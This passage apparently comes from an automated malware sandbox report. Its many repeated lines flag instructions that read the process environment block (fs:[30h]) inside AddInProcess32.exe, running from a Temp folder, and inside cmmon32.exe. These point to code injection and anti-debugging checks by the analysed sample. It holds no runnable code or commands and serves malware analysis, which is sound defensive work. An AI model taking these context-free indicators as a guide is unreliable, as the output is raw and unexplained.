          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01814F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01814F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01843B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01843B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01858EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01842AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01848E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01828A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01815210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0184A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01833A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0181E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01854A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01854A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_018E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0182766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0185927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E98DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E12990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E23D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E63540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E07D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E04120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04EB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04DEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E12AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E28EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 19_2_04E9FEC0 mov eax, dword ptr fs:[00000030h]
